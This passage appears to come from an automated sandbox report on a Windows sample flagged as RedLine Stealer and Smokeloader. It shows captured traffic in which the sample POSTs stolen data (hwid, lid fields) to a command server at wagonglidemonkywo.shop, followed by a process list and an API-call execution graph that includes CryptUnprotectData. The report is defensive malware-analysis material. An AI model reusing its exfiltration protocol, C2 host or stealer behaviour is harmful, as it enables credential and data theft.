                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zy%2BqM8YX7wl6XnhC0JPtA0TldPf3NjQuTvvaMxa0VTNT3zjDK%2BiGJcokOPcUCT84VKXVcUnPEjAS%2FZJCnbCSP9J%2Bsg3Ma6Aqeyg2nIxlBktFT5%2FSCTXxno%2FTNCd3aZxpCeUDP0nFMm2U"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0b09bdc3201c-IAD
                                            alt-svc: h3=":443"; ma=86400
                                            2024-03-29 07:10:57 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                            Data Ascii: 10ok 102.165.48.43
                                            2024-03-29 07:10:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.449737172.67.221.1284437556C:\Users\user\Desktop\20qMFnd9tO.exe
                                            TimestampBytes transferredDirectionData
                                            2024-03-29 07:10:58 UTC289OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 593802
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:58 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 30 46 33 41 45 33 30 41 34 35 37 31 34 32 31 30 33 38 43 30 44 44 36 33 45 38 37 44 41 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"070F3AE30A4571421038C0DD63E87DA4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                            2024-03-29 07:10:58 UTC15331OUTData Raw: 20 f1 0a 11 08 ae f1 b3 73 14 d7 02 4c 7a d2 d9 39 c7 81 ce 7a e2 ff ea ea 7f 2f b5 c0 bd b8 05 cc 62 40 94 31 35 db 07 e1 b4 82 60 07 d3 a0 da 08 8d f5 88 65 e5 1c f5 dc 81 e2 ee a6 3c d8 19 0e 57 84 1b 5d 68 a5 41 cc c3 52 3d 04 70 25 3e c5 ce 05 03 cc e5 97 8f 19 07 44 ec 48 b3 2b 16 92 53 81 a9 3b b6 0b 35 68 de 9b 5f 12 83 56 be 19 b1 84 3a a4 dc ed b9 50 f8 f0 a7 d8 37 8b 13 2a bc 49 8d 18 6a 85 99 ac fa 20 2c d3 5d 88 e4 54 bc a9 c2 22 4c fe 79 cc 1c 25 69 ab ce c7 49 9e 53 63 2f cc 25 ad c8 57 74 ff 93 7a 86 7e 48 88 4c a2 b5 a2 a8 fc 1b 52 2b 9d 7e b0 de 8e dc ff 82 0c b0 b0 d7 2f 68 6d ab 53 58 b1 45 f9 53 9f 50 16 d2 40 46 58 e3 0d 37 b6 3d 14 0b 86 ec 4f d4 94 a9 5c 6b 34 4e a3 52 dc d0 6f 76 a8 43 f5 7d 6f 87 9b d2 77 cb e5 ad c3 1a 93 48 6a
                                            Data Ascii: sLz9z/b@15`e<W]hAR=p%>DH+S;5h_V:P7*Ij ,]T"Ly%iISc/%Wtz~HLR+~/hmSXESP@FX7=O\k4NRovC}owHj
                                            2024-03-29 07:10:58 UTC15331OUTData Raw: 10 72 75 65 e4 aa a9 2d a8 cf 31 e5 d8 d7 e7 3f ce b7 05 54 61 13 aa 8e 62 61 c3 67 91 2d 12 74 b1 3f f5 1a af 9c ba 56 6c 8c b1 86 c8 39 1e 59 d7 ce fc 78 57 bc 95 b5 24 0c 5b 9e 30 e9 01 8d 5a 48 c0 8f 41 30 7c 23 fa 5f 3f c6 8b 15 c9 bc e1 47 6f 35 49 4b 90 f9 a6 4f d4 82 03 1e 22 47 1a 59 6f 88 44 a2 25 ff 34 c9 4a 53 3b bb 7c 66 5e c1 96 01 d3 31 0f 2a 7a 6d a9 7a 50 a7 c8 4d 7e 6a 75 80 f0 82 f5 a2 f1 84 22 bf 91 0e bf fa 1e b3 90 a9 56 27 6e bc 08 2d 79 87 80 89 ad 32 b7 dd e2 6e 05 41 7d d8 bc 35 43 e4 6a 33 08 05 bc da 5f 1f d4 c3 03 dc b1 7d 04 f5 96 12 7c 9e 7d 29 f0 c8 be 43 69 de 4c 9b b1 7c 1e cc c7 ef 96 96 d3 8c f9 6c 68 9b 4f 3a f6 3c 68 73 30 78 e9 f6 37 a3 c9 81 f6 75 46 b1 e5 fe 8e 73 2c 49 74 30 91 b7 af 96 f1 98 af dd b3 4e 91 a6 30
                                            Data Ascii: rue-1?Tabag-t?Vl9YxW$[0ZHA0|#_?Go5IKO"GYoD%4JS;|f^1*zmzPM~ju"V'n-y2nA}5Cj3_}|})CiL|lhO:<hs0x7uFs,It0N0
                                            2024-03-29 07:10:58 UTC15331OUTData Raw: 51 f4 db fd c5 d8 f8 90 bd fb 8b 5f cb 6c 3f 21 63 07 14 e2 e3 15 c7 ea bf d0 bc 41 6e 25 07 0d 64 57 87 f3 f5 6c df 4a 82 0e e3 2c ae 0f 2c 37 05 fe 62 49 fe db 00 e5 ec 98 b3 00 70 60 34 cf 44 25 30 62 54 26 24 97 1b bf e1 cd d4 9d fa 62 85 78 68 81 19 18 3e 78 e6 2c be 39 f1 9a 28 d8 a3 b0 7d df c7 0f f8 bb 6d 86 1e 56 37 27 05 b8 c5 c7 1b 7a 28 41 40 d0 6c b7 11 5b 06 69 b2 67 a9 bd 93 d0 0a 0a b2 d8 a6 bb e4 87 d5 b7 d1 cc ec 92 99 e7 50 d8 ef 56 fb 04 fd 16 7c 35 1c 44 91 af d9 de 7f ca f9 bb dd 7e ff b5 c7 fa a8 46 95 e7 51 d2 89 69 06 4e 30 c8 09 d8 27 58 60 e8 a9 2c d4 a9 18 bd 75 5c 5b ac c4 ad af 57 19 11 1a 24 f0 d0 b6 71 6f ee 25 cd 86 64 e5 99 27 72 8f 76 83 53 5d d9 76 b5 01 8f 2e 26 fa bc 34 3b b0 20 0d 7a 1f 7a 9a 20 66 fa 6d 45 c0 df 9d
                                            Data Ascii: Q_l?!cAn%dWlJ,,7bIp`4D%0bT&$bxh>x,9(}mV7'z(A@l[igPV|5D~FQiN0'X`,u\[W$qo%d'rvS]v.&4; zz fmE
                                            2024-03-29 07:10:58 UTC15331OUTData Raw: 6b 4b 68 34 8c 5a 7e c4 c7 1d a3 b9 f8 16 97 49 9a ee fd ac a6 91 63 c1 f6 2b bd a6 33 f2 8e 8e 57 96 17 5f f8 b6 ad a6 33 da 1e 5a dd ed 4d 7e fe d1 e8 67 39 0f 29 ed b6 f9 62 f5 07 75 6b 6f e6 dc 89 2c 8b aa 09 56 ed dd 5d d2 14 16 7c 4b 7d 38 27 65 5d 4a e1 83 b5 c2 73 57 0c d3 ef 05 c4 46 d6 85 80 ef e1 d0 fb 57 d6 11 b4 e5 85 2e 2d fc ac ec f6 0f db 5f 3a e8 68 0c cf e2 5b c5 e2 9a ae 5a 32 1a 6f 79 ea 4a fd f4 1e 2e 53 8c 4e fa 20 75 f7 e0 e3 23 ec 22 7f d8 99 d0 5c 0b 84 8f 30 28 80 df 30 52 05 bd 52 e9 c7 8c dd 85 ed 0e 01 c8 eb 80 b8 c8 77 5a ed 10 1a d0 c5 b7 4a 13 93 09 57 24 1f 7a c3 00 2a de 9c 48 ac c8 f5 cb 45 c7 94 c8 e1 02 14 a7 b9 02 7b 3b 51 b3 72 3e fd 87 7d c4 3b 40 fc cb 15 7f f9 83 aa 83 a8 bd bb 03 7b 86 84 3e 21 a7 72 4e 5e c3 3d
                                            Data Ascii: kKh4Z~Ic+3W_3ZM~g9)buko,V]|K}8'e]JsWFW.-_:h[Z2oyJ.SN u#"\0(0RRwZJW$z*HE{;Qr>};@{>!rN^=
                                            2024-03-29 07:10:58 UTC15331OUTData Raw: 1b 48 2d c6 3b 8b 74 d7 87 c8 7b 2d 9d 37 a4 5f bf 5a 6f 2b 0a 9a 5b 78 f5 2a b0 1c 2b ac bc 60 f8 75 db 08 82 5a 21 88 2c 68 d3 61 21 9e dd 72 57 0d 19 36 88 e6 dd 74 c6 7d cd 13 73 16 68 35 ae d6 63 9d 25 e1 f7 90 56 0b 94 8e 7e f1 85 e1 20 47 de 7b 7d 82 74 d5 68 f6 a4 1e fd 42 3e 6e c8 f6 e6 73 db 9d c3 d2 8c 64 34 ed 6e ee 07 d2 68 68 51 35 d4 28 a1 c6 b0 9d 69 f4 d3 c3 9f ea ea 2c 7e 16 90 87 3f 2a 0d 8b f2 fc 57 92 db 6a 50 43 46 51 60 83 df 19 22 f8 87 2f 4e e4 d6 07 5c e4 20 a2 94 17 fc 12 6d 64 86 d6 c4 36 cf 98 7c 92 83 12 6b 74 5b d9 67 e9 19 84 98 25 b4 32 eb 6c 57 6a d9 d6 15 d7 1a ef 98 62 bc c6 63 be 0c e2 2b 7a 3c e4 28 1b 54 7e e1 84 44 7f 80 30 ee ad 5f ec d2 56 4d 14 e5 c5 f7 0c 8f 2d fc fc f8 86 22 1d 3d 1f e2 d9 52 c6 1e 67 14 60 77
                                            Data Ascii: H-;t{-7_Zo+[x*+`uZ!,ha!rW6t}sh5c%V~ G{}thB>nsd4nhhQ5(i,~?*WjPCFQ`"/N\ md6|kt[g%2lWjbc+z<(T~D0_VM-"=Rg`w
                                            2024-03-29 07:10:58 UTC15331OUTData Raw: 03 78 a6 68 82 2c 00 a0 55 b0 85 07 f9 c7 71 d4 96 6a ca d3 30 c6 f8 9f d9 7c 7c 28 25 f6 8d fc ef 5d f1 5f 02 f6 01 0a d0 17 5c 22 5c 63 af 39 09 ae e3 37 94 58 68 a5 d0 3b 29 42 97 5d 57 8b 84 a8 65 eb 22 a8 c9 4b 64 69 d1 dd 47 cf 75 37 04 f4 8a 4d cf a5 f1 29 1e 80 e4 47 4f a6 57 30 b1 8c e3 08 f5 04 d6 00 5f 92 01 08 ce d1 82 83 33 d7 6c 60 4b 74 e3 92 7a 7f b3 57 84 cf 15 31 52 2a b5 c5 b0 c4 72 d9 12 4a 0d 0b ec 25 65 2f 50 4b 50 2b 95 ae c2 ab 79 f3 66 b4 17 21 61 dd 82 dd b8 f6 7b c1 fc ad 6b f6 cd 71 df 6d 92 36 1d a0 54 af a5 1b bc 6a 83 e9 c3 06 fd 38 bd a8 81 98 67 b0 e3 8b 08 da 56 ca c0 33 74 a0 dc c6 b5 68 7a 80 2e 80 b6 56 4b c9 e5 de ef ab 36 73 b7 bc 7a 01 7d c3 ab aa 05 a2 73 14 e9 6c 14 3d 7e 73 ee bd 12 ca 3f e0 e3 7a a5 d9 ee dc 0f
                                            Data Ascii: xh,Uqj0||(%]_\"\c97Xh;)B]We"KdiGu7M)GOW0_3l`KtzW1R*rJ%e/PKP+yf!a{kqm6Tj8gV3thz.VK6sz}sl=~s?z
                                            2024-03-29 07:10:58 UTC15331OUTData Raw: d3 ba c6 f8 88 87 9c 5f 7b 3c 75 6f 8a d3 de cf 87 0a 50 ca 5e 7d ba 5d 5c c6 5e fe 8f 2c bc e9 81 b4 d5 18 6e 28 a3 61 82 d1 04 fd f7 b4 62 9c 5b 13 e9 f0 78 20 28 94 a7 a9 bd 79 a0 7b 79 fd d8 35 10 b2 71 02 5a 32 f3 35 9b ef e6 e9 9e dc 24 f2 07 56 3c ed df cb d5 84 f1 9c 32 58 99 8d e4 ff a8 ea fd 24 29 56 b3 e3 d2 f1 6a 3e 1f f3 9b 0d 1c 01 27 44 32 65 ac b6 27 6b fd 33 3f 7d d1 73 cb 04 27 9c 7e 01 9c 44 0f cd dd dd b3 3c d4 35 20 57 6a 5a f2 69 70 b4 a6 82 17 e9 3f c4 e7 1d d8 c5 60 4d 74 4a 55 ed 4d 56 dc 0f 78 23 89 50 e1 38 5e 97 f7 b3 4b d3 60 af 80 af 22 bb 3c 11 35 b4 27 b8 7a 7b 64 24 e5 42 b7 6a 64 44 c5 42 58 19 43 40 8f eb 67 5c 64 b8 a8 f4 c6 4e 6c 3e af 69 56 db 4b e9 89 1b 63 2b 0e 85 76 bd 53 ac 59 c3 af 3b b2 d0 3b 01 6f 72 f8 0b de
                                            Data Ascii: _{<uoP^}]\^,n(ab[x (y{y5qZ25$V<2X$)Vj>'D2e'k3?}s'~D<5 WjZip?`MtJUMVx#P8^K`"<5'z{d$BjdDBXC@g\dNl>iVKc+vSY;;or
                                            2024-03-29 07:10:58 UTC15331OUTData Raw: 04 72 e7 02 78 1f 16 bb 8c 60 5b 65 a7 79 78 cb 98 f5 3c 23 f8 76 5d 30 bf 7a 05 17 bf 79 49 05 37 4a 57 5c 1d 0b 7d bb 90 1d 55 16 7a f5 24 8e bd be 2d ea 62 3e cd 8a ba 0d 1a e7 e1 13 51 5c 83 42 4b ca e7 c9 a3 42 72 17 91 0e 79 75 a9 d5 0c 45 cc 4f 51 52 a1 e9 e1 26 27 b2 81 86 42 83 69 3c 51 67 0c 9c 65 0a 1f bb 48 6a ac 18 7a 78 6d f4 47 0d 7a b5 ae ec 06 74 d2 9c a0 2f b8 9e 97 da e6 2e 4b 76 dc 9b 1b c6 d3 24 c0 c1 14 6f 54 d1 25 32 86 aa 09 da 14 0a 8b f9 6f d1 f0 29 a9 84 57 aa af b7 95 0e 48 10 2c cc 32 a6 52 ef f1 64 14 a7 dd 02 25 ae 67 d9 b4 ed 0b 09 ab 9f 93 a7 ab 4e 40 52 e1 af fd f0 e7 60 3f af 0f d2 f4 91 a7 74 8b 10 ab a6 c5 cc e8 7c f3 ed 82 13 cd 82 fa db 5d 40 47 7b a5 29 8b 46 9b 8b f3 56 f2 4b 7c 4a 8e 09 ab a0 f9 fc 4d 68 f9 6f be
                                            Data Ascii: rx`[eyx<#v]0zyI7JW\}Uz$-b>Q\BKBryuEOQR&'Bi<QgeHjzxmGzt/.Kv$oT%2o)WH,2Rd%gN@R`?t|]@G{)FVK|JMho
                                            2024-03-29 07:10:58 UTC15331OUTData Raw: 1d cd 21 d5 66 2d 01 b7 58 1f cf ae e4 8e 55 4c ba 14 5d 98 71 75 ad d8 a8 5c 0d 3e bf fd f6 f6 8c 62 cb f1 a1 5f df 66 3f b7 b4 57 6e e5 5a cb b4 ec 6d 8f f2 d3 5c a1 f5 a4 a4 2d e4 5a 6f 2f bb f0 fc 2e 15 9d 3d ad 33 ac 95 cf 6e eb ff 95 98 ba f0 86 b6 30 91 33 f9 5a 60 4f ea ea 79 db 7a ad ac 4d 12 f5 02 cb d0 df f2 8f c8 e3 c8 91 37 65 ae 6f 5a fa e7 0c 3a a8 75 fb 67 37 ae fa 71 5e d6 6f ab 39 04 95 4b f2 94 4e bd 41 7b 3f 11 96 7b a0 76 05 1b 56 1e 69 ec 01 9a 6b 1e 3e 24 f6 39 2d 27 92 08 c4 7c e2 c4 57 b6 d5 b8 a3 0b fb 6b 50 9a 3b 5c 1d fa 08 c1 ee 0c 63 1c 9f 4b 29 b5 9e d3 2c 97 4d 9d 3d 43 b3 c7 52 bc ea 1f 6f c4 45 a1 e7 05 69 d3 e8 97 bc 6f 4a 5c 0e 78 cc 43 cc 21 3b 8b e2 bc 9d 45 8a 35 cf 68 f5 9e b3 5e 60 28 96 aa b9 23 79 02 de 43 de 21
                                            Data Ascii: !f-XUL]qu\>b_f?WnZm\-Zo/.=3n03Z`OyzM7eoZ:ug7q^o9KNA{?{vVik>$9-'|WkP;\cK),M=CRoEioJ\xC!;E5h^`(#yC!
                                            2024-03-29 07:11:00 UTC806INHTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:11:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=p6qfuqk65ec44qevpbkfvf296d; expires=Tue, 23-Jul-2024 00:57:39 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WQ86hKFdK1S3Avb92MJmN%2B113QL94FZQdgUhkXBVQ6fAM9mKog56eqq%2BUHUDG258FoRSN6J9unGMkh%2FHQNyasiIyic6mbsSuzlZQ6Tl1TAhkcfCJHQkW8Y%2BgNRmkbo1k4YJNRjeK7TuF"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0b11dd09581e-IAD
                                            alt-svc: h3=":443"; ma=86400


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:08:10:50
                                            Start date:29/03/2024
                                            Path:C:\Users\user\Desktop\20qMFnd9tO.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\20qMFnd9tO.exe"
                                            Imagebase:0x400000
                                            File size:327'680 bytes
                                            MD5 hash:0F4A71F80CD80F172817F116318E3FCA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:08:11:00
                                            Start date:29/03/2024
                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 1556
                                            Imagebase:0xe60000
                                            File size:483'680 bytes
                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:8.7%
                                              Dynamic/Decrypted Code Coverage:8.6%
                                              Signature Coverage:45.7%
                                              Total number of Nodes:348
                                              Total number of Limit Nodes:11
                                              execution_graph 17874 414c41 17883 415850 17874->17883 17876 414c61 17877 409bc0 RtlExpandEnvironmentStrings RtlAllocateHeap 17876->17877 17878 414c6b 17877->17878 17879 415850 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap NtAllocateVirtualMemory NtFreeVirtualMemory 17878->17879 17880 414c9a 17879->17880 17881 409bc0 RtlExpandEnvironmentStrings RtlAllocateHeap 17880->17881 17882 414ca4 17881->17882 17884 415870 17883->17884 17884->17884 17885 41587b RtlExpandEnvironmentStrings 17884->17885 17886 41589e 17885->17886 17894 432120 17886->17894 17888 4158ae RtlExpandEnvironmentStrings 17889 41593a 17888->17889 17890 432120 RtlAllocateHeap 17889->17890 17891 4159d5 17890->17891 17891->17891 17897 436e10 17891->17897 17893 415a5c 17895 432172 17894->17895 17896 4321a7 RtlAllocateHeap 17894->17896 17895->17896 17896->17888 17898 436e20 17897->17898 17898->17898 17899 432120 RtlAllocateHeap 17898->17899 17901 436e40 17899->17901 17900 436eff 17900->17893 17901->17900 17902 436f04 NtAllocateVirtualMemory 17901->17902 17903 436fc0 NtFreeVirtualMemory 17902->17903 17903->17900 18081 415300 18082 41533b 18081->18082 18083 41531a 18081->18083 18083->18082 18084 415340 NtAllocateVirtualMemory 18083->18084 18085 4153ce NtFreeVirtualMemory 18084->18085 18085->18082 17904 418142 17905 418190 17904->17905 17905->17905 17908 418d90 17905->17908 17909 436e10 3 API calls 17908->17909 17910 418df0 17909->17910 17911 4162c7 17912 4162d5 17911->17912 17913 432120 RtlAllocateHeap 17912->17913 17915 416416 17913->17915 17914 416610 CryptUnprotectData 17915->17914 18086 414d06 18087 414d15 18086->18087 18112 41b230 18087->18112 18089 414d1b 18090 409bc0 RtlExpandEnvironmentStrings RtlAllocateHeap 18089->18090 18091 414d25 18090->18091 18092 41bfe0 7 API calls 18091->18092 18093 414d3a 18092->18093 18094 409bc0 RtlExpandEnvironmentStrings RtlAllocateHeap 18093->18094 18095 414d44 18094->18095 18096 41c210 NtAllocateVirtualMemory NtFreeVirtualMemory 18095->18096 18097 414d59 18096->18097 18098 409bc0 RtlExpandEnvironmentStrings RtlAllocateHeap 18097->18098 18099 414d63 18098->18099 18100 41efd0 6 API calls 18099->18100 18101 414d81 18100->18101 18102 409bc0 RtlExpandEnvironmentStrings RtlAllocateHeap 18101->18102 18103 414d94 18102->18103 18104 4203a0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap 18103->18104 18105 414da9 18104->18105 18106 409bc0 RtlExpandEnvironmentStrings RtlAllocateHeap 18105->18106 18107 414db3 18106->18107 18108 421ab0 RtlAllocateHeap 18107->18108 18109 414dc8 18108->18109 18110 42afe0 6 API calls 18109->18110 18111 414dd1 18110->18111 18113 41b2b9 18112->18113 18114 41b30c RtlExpandEnvironmentStrings 18112->18114 18113->18114 18115 41b357 18114->18115 18116 432120 RtlAllocateHeap 18115->18116 18117 41b367 RtlExpandEnvironmentStrings 18116->18117 18118 41b3ec 18117->18118 18119 432120 RtlAllocateHeap 18118->18119 18120 41b48c 18119->18120 18120->18120 18121 436e10 3 API calls 18120->18121 18122 41b518 18121->18122 18123 434d0a 18124 434d2b NtMapViewOfSection 18123->18124 17916 4191cd 17917 4191d2 17916->17917 17918 432120 RtlAllocateHeap 17917->17918 17919 4191e1 17918->17919 17922 419c00 17919->17922 17923 4192ae 17922->17923 17924 419c19 17922->17924 17924->17923 17925 419c40 NtAllocateVirtualMemory 17924->17925 17926 419ced NtFreeVirtualMemory 17925->17926 17926->17923 18125 41218c 18126 4121a0 18125->18126 18127 432120 RtlAllocateHeap 18126->18127 18128 41375b 18127->18128 18129 432120 RtlAllocateHeap 18128->18129 18131 413804 18129->18131 18135 417fa0 18131->18135 18132 4138a3 18133 409bc0 RtlExpandEnvironmentStrings RtlAllocateHeap 18132->18133 18134 4138ad 18133->18134 18136 417fc0 18135->18136 18136->18136 18137 417fcb RtlExpandEnvironmentStrings 18136->18137 18138 417fec 18137->18138 18139 432120 RtlAllocateHeap 18138->18139 18140 417ffb RtlExpandEnvironmentStrings 18139->18140 18141 436e10 3 API calls 18140->18141 18142 41802e 18141->18142 17927 417150 17930 417ac0 17927->17930 17931 417b84 17930->17931 17932 432120 RtlAllocateHeap 17931->17932 17933 417c5b 17932->17933 17934 432120 RtlAllocateHeap 17933->17934 17935 417e42 17934->17935 17935->17935 17938 418c50 17935->17938 17939 418d90 3 API calls 17938->17939 17940 418c8f 17939->17940 17941 41a1d0 17942 41a1db 17941->17942 17948 41a22f 17941->17948 17943 432120 RtlAllocateHeap 17942->17943 17944 41a23e 17943->17944 17945 432120 RtlAllocateHeap 17944->17945 17946 41a2d0 17945->17946 17946->17946 17947 418c50 3 API calls 17946->17947 17947->17948 17949 4306d2 17952 436470 17949->17952 17951 4306f2 GetVolumeInformationW 17953 41c3d3 17954 41c3e7 17953->17954 17957 4376c0 17954->17957 17956 41c402 17958 4376d9 17957->17958 17966 4376ff 17957->17966 17959 437704 NtAllocateVirtualMemory 17958->17959 17958->17966 17960 4377ac NtFreeVirtualMemory 17959->17960 17961 4377d5 17960->17961 17960->17966 17962 432120 RtlAllocateHeap 17961->17962 17964 4377de 17962->17964 17963 437824 NtAllocateVirtualMemory 17965 4378d0 NtFreeVirtualMemory 17963->17965 17964->17963 17964->17966 17965->17966 17966->17956 17966->17966 18143 6e003c 18144 6e0049 18143->18144 18158 6e0e0f SetErrorMode SetErrorMode 18144->18158 18149 6e0265 18150 6e02ce VirtualProtect 18149->18150 18154 6e030b 18150->18154 18151 6e0439 VirtualFree 18152 6e04be 18151->18152 18153 6e05f4 LoadLibraryA 18151->18153 18152->18153 18155 6e04e3 LoadLibraryA 18152->18155 18157 6e08c7 18153->18157 18154->18151 18155->18152 18159 6e0223 18158->18159 18160 6e0d90 18159->18160 18161 6e0dad 18160->18161 18162 6e0dbb GetPEB 18161->18162 18163 6e0238 VirtualAlloc 18161->18163 18162->18163 18163->18149 18164 423c16 18165 423bf1 18164->18165 18165->18164 18166 423d77 NtAllocateVirtualMemory 18165->18166 18167 423e23 NtFreeVirtualMemory 18166->18167 18168 415b15 18169 415b1b 18168->18169 18170 415b86 NtAllocateVirtualMemory 18169->18170 18171 415c28 NtFreeVirtualMemory 18170->18171 18172 434917 18175 434927 18172->18175 18173 434b06 LoadLibraryW 18174 434b0d 18173->18174 18175->18173 18175->18175 18176 423596 18177 42359d 18176->18177 18177->18177 18178 430570 RtlExpandEnvironmentStrings 18177->18178 18179 4236aa 18178->18179 18180 4236f4 GetPhysicallyInstalledSystemMemory 18179->18180 18181 423719 18180->18181 18182 414e97 18189 42b190 14 API calls 18182->18189 18184 414e9d 18185 409bc0 RtlExpandEnvironmentStrings RtlAllocateHeap 18184->18185 18186 414ea7 18185->18186 18187 402780 RtlFreeHeap 18186->18187 18188 414f40 18187->18188 18190 41f516 18191 41f605 18190->18191 18194 4322c0 18191->18194 18193 41f63f 18195 4322e7 18194->18195 18203 43230f 18194->18203 18196 432314 NtAllocateVirtualMemory 18195->18196 18195->18203 18197 4323b4 NtFreeVirtualMemory 18196->18197 18198 4323e1 RtlAllocateHeap 18197->18198 18197->18203 18200 43248d 18198->18200 18198->18203 18201 4324c4 NtAllocateVirtualMemory 18200->18201 18200->18203 18202 432558 NtFreeVirtualMemory 18201->18202 18202->18203 18203->18193 18204 7df92a 18205 7df934 18204->18205 18208 7dfd26 18205->18208 18209 7dfd35 18208->18209 18212 7e04c6 18209->18212 18213 7e04e1 18212->18213 18214 7e04ea CreateToolhelp32Snapshot 18213->18214 18215 7e0506 Module32First 18213->18215 18214->18213 18214->18215 18216 7dfd25 18215->18216 18217 7e0515 18215->18217 18219 7e0185 18217->18219 18220 7e01b0 18219->18220 18221 7e01f9 18220->18221 18222 7e01c1 VirtualAlloc 18220->18222 18221->18221 18222->18221 17972 41475f 17977 409bc0 17972->17977 17974 41476c 17975 409bc0 2 API calls 17974->17975 17976 414780 17975->17976 17978 409bd9 17977->17978 17982 409cba 17977->17982 17983 430570 17978->17983 17980 409c98 17981 432120 RtlAllocateHeap 17980->17981 17981->17982 17982->17974 17984 4305f1 17983->17984 17985 43063d RtlExpandEnvironmentStrings 17983->17985 17984->17985 18223 4171a5 18224 4171eb 18223->18224 18237 415400 18224->18237 18226 417225 18227 415400 RtlAllocateHeap NtAllocateVirtualMemory NtFreeVirtualMemory 18226->18227 18228 4172d4 18227->18228 18229 415400 RtlAllocateHeap NtAllocateVirtualMemory NtFreeVirtualMemory 18228->18229 18230 4173af 18229->18230 18231 415400 RtlAllocateHeap NtAllocateVirtualMemory NtFreeVirtualMemory 18230->18231 18232 417464 18231->18232 18233 432120 RtlAllocateHeap 18232->18233 18234 417560 18233->18234 18234->18234 18235 436ff0 RtlAllocateHeap NtAllocateVirtualMemory NtFreeVirtualMemory 18234->18235 18236 41762f 18235->18236 18238 415420 18237->18238 18239 432120 RtlAllocateHeap 18238->18239 18240 41546d 18239->18240 18240->18240 18241 436e10 3 API calls 18240->18241 18242 4154dc 18241->18242 18243 4226a7 18244 4226b1 18243->18244 18244->18244 18245 422afe GetComputerNameExA 18244->18245 18247 422b81 18245->18247 18246 422c1b GetComputerNameExA 18248 422c9f 18246->18248 18247->18246 18247->18247 17991 435ae5 RtlReAllocateHeap 17992 435af9 17991->17992 18249 4166a7 18251 4166af 18249->18251 18250 4166ef 18251->18250 18252 4166f4 NtAllocateVirtualMemory 18251->18252 18253 416798 NtFreeVirtualMemory 18252->18253 18253->18250 18008 42c3eb 18011 404ab0 18008->18011 18010 42c433 18014 404ac5 18011->18014 18012 404e00 18017 4034c0 18012->18017 18014->18012 18015 4034c0 HeapCreate 18014->18015 18016 404e17 18014->18016 18015->18014 18016->18010 18018 4034d4 18017->18018 18020 4034fa 18017->18020 18018->18020 18021 403740 18018->18021 18020->18016 18023 403790 18021->18023 18022 403a4b 18022->18020 18023->18022 18024 403ebc HeapCreate 18023->18024 18024->18023 18254 434eaa 18256 434ec2 18254->18256 